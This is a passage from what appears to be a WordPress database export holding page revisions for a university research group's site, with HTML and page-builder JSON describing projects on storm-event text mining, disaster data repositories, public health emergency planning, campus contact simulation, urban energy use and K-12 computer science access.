<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:16:20','2023-09-29 15:16:20','',126,'https://gsudice.dataconn.net/?p=1543',0,'revision','',0),(1549,1,'2023-09-29 11:16:59','2023-09-29 15:16:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:16:59','2023-09-29 15:16:59','',438,'https://gsudice.dataconn.net/?p=1549',0,'revision','',0),(1550,1,'2023-09-29 11:16:59','2023-09-29 15:16:59','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 